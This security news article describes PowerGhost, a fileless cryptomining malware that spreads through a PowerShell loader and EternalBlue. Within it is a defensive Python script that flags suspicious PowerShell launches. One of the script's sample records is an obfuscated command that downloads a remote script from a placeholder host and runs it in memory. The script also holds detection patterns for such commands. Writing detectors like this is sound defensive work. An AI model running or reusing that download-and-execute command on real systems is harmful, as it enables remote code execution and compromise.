• PowerGhost uses a PowerShell script and the EternalBlue exploit to spread across infected networks.
• Cryptocurrency-mining malware has surpassed ransomware in recent months as cybercriminals shift towards cryptomining campaigns to make money.

Security researchers have discovered a new fileless, cryptocurrency-mining malware that has been targeting large corporate networks across the globe, infecting both business PCs and servers. According to Kaspersky Lab researchers, the stealthy malware dubbed PowerGhost features a combination of PowerShell script and the notorious EternalBlue exploit to spread across infected networks.

EternalBlue is a hacking tool developed by the US National Security Agency that was infamously leaked by the hacker group Shadow Brokers in April 2017 and has since been used by cybercriminals to power several malicious campaigns including the WannaCry and NotPetya attacks.

Modus Operandi

The malware itself is an obfuscated PowerShell script that contains the core code and several add-on modules including one for reflective portable executable injection, a shellcode for the EternalBlue exploit, the miner and several other modules for the miner's operation such as mimikatz.

"The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies," Kaspersky Lab researchers wrote in a blog post. "The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive."

Since the script isn't stored on the infected machine's hard drive, PowerGhost is harder to detect and thwart.
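Although nothing is written to disk, the one-line PowerShell launch described above still produces a process-creation record when command-line logging is enabled. The sketch below is an added example, not code from Kaspersky Lab or from this article: it triages such records for a download piped into in-memory execution and raises severity when the parent is the WMI provider host. The record fields, host names and URLs are constructed assumptions.

```python
import re

# Constructed process-creation records (fields modeled on Sysmon Event ID 1).
# Hosts, paths and URLs are placeholders, not PowerGhost indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
SAMPLE_EVENTS = [
    {"host": "ws-014", "parent": WMI, "image": PS,
     "cmdline": "powershell -nop -w hidden -c \"I`EX (New-Object "
                "Net.Web`Client).Download`String('http://example.invalid/a')\""},
    {"host": "ws-022", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inv.ps1"},
    {"host": "srv-003", "parent": WMI, "image": PS,
     "cmdline": r"powershell.exe -NonInteractive -File C:\Ops\patch-report.ps1"},
    {"host": "ws-031", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},  # filler blob
]

FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b")
EXEC = re.compile(r"\biex\b|invoke-expression")
ENCODED = re.compile(r"\s-e(?:c|n[a-z]*)?\s+[a-z0-9+/=]{20,}")

def normalize(cmdline):
    """Lowercase and drop backtick/caret escapes used to split keywords."""
    return re.sub(r"[`^]", "", cmdline).lower()

def triage(event):
    """Return (severity, reasons) for one record, or None if nothing matches."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = normalize(event["cmdline"])
    reasons = []
    if FETCH.search(cmd) and EXEC.search(cmd):
        reasons.append("download piped to in-memory execution")
    if ENCODED.search(cmd):
        reasons.append("encoded command hides script body")
    if not reasons:
        return None
    via_wmi = event["parent"].lower().endswith("wmiprvse.exe")
    if via_wmi:  # a WMI parent alone is not flagged; it only raises severity
        reasons.append("launched by WMI provider host")
    return ("high" if via_wmi else "medium", reasons)

def scan(events):
    """Return {host: (severity, reasons)} for every flagged record."""
    return {e["host"]: r for e in events if (r := triage(e))}

if __name__ == "__main__":
    for host, (sev, reasons) in scan(SAMPLE_EVENTS).items():
        print(f"{sev:6} {host}: {'; '.join(reasons)}")
```

The normalization step only removes backtick and caret escapes; string concatenation and other obfuscation need PowerShell script block logging rather than command-line matching.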

Once a machine is infected, PowerGhost leverages the EternalBlue exploit to spread across the local network, uses mimikatz to harvest credentials, and escalates privileges with 32-bit or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120. It then uses reflective PE injection to load a PE file and launch the miner to generate cryptocurrency.

So far, PowerGhost has primarily targeted corporate networks in India, Brazil, Colombia and Turkey.

Researchers also noted that one version of PowerGhost could be used to conduct DDoS attacks, likely to earn its authors extra money by offering DDoS services as well.

Shift from ransomware to cryptomining malware

Cryptocurrency-mining malware has surpassed ransomware of late as cybercriminals increasingly shift towards cryptomining campaigns to make money off of victims.

"The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system," researchers said. "It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans."

Cyware Publisher